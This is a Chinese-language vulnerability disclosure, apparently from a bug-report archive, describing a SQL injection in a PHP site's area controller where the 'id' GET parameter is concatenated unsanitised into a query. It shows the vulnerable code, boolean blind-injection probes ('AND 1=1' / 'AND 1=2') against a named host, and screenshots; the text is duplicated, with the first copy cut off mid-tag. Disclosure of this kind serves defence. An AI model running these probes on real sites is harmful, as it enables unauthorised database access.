### 简要描述: 未对id进行参数类型强制传化,使得存在注入 ### 详细说明: \app\controller\area.class.php中未对id进行处理,存在注入 ``` public function getCitys() { $aeraObj = M("area"); $provinceId = $_GET["id"]; //未进行任何处理 return $aeraObj->getCitysByProvinceId($provinceId); } ``` \app\model\areaAction.class.php 下直接进行sql处理 ``` public function getCitysByProvinceId($provinceId) { $type = $_GET['type']; $ary =$this->where("pid = ".$provinceId)->limit(1000)->find(); //$provinceId未处理 ``` ### 漏洞证明: 访问:http://www.teamcen.com/index.php?id=1&ac=area_getCitys正常显示 接着 http://www.teamcen.com/index.php?id=1 AND 1=1&ac=area_getCitys ``` ``` [<img src="https://images.seebug.org/upload/201401/1323402565c151a9a447a9d8b69e9b1894d76dfd.png" alt="1=1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/1323402565c151a9a447a9d8b69e9b1894d76dfd.png) ``` ``` 再接着 http://www.teamcen.com/index.php?id=1 AND 1=2&ac=area_getCitys [<img...
### 简要描述: 未对id进行参数类型强制传化,使得存在注入 ### 详细说明: \app\controller\area.class.php中未对id进行处理,存在注入 ``` public function getCitys() { $aeraObj = M("area"); $provinceId = $_GET["id"]; //未进行任何处理 return $aeraObj->getCitysByProvinceId($provinceId); } ``` \app\model\areaAction.class.php 下直接进行sql处理 ``` public function getCitysByProvinceId($provinceId) { $type = $_GET['type']; $ary =$this->where("pid = ".$provinceId)->limit(1000)->find(); //$provinceId未处理 ``` ### 漏洞证明: 访问:http://www.teamcen.com/index.php?id=1&ac=area_getCitys正常显示 接着 http://www.teamcen.com/index.php?id=1 AND 1=1&ac=area_getCitys ``` ``` [<img src="https://images.seebug.org/upload/201401/1323402565c151a9a447a9d8b69e9b1894d76dfd.png" alt="1=1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/1323402565c151a9a447a9d8b69e9b1894d76dfd.png) ``` ``` 再接着 http://www.teamcen.com/index.php?id=1 AND 1=2&ac=area_getCitys [<img src="https://images.seebug.org/upload/201401/132341064705121bc1aaedf2d009e45f03265f34.png" alt="1=2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/132341064705121bc1aaedf2d009e45f03265f34.png) 本地测试 可判断出 管理员用户个数为1 [<img src="https://images.seebug.org/upload/201401/13234538e80634ca75be28f5eb8b018c775fb16c.png" alt="count=1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/13234538e80634ca75be28f5eb8b018c775fb16c.png) .... 各种盲注判断了
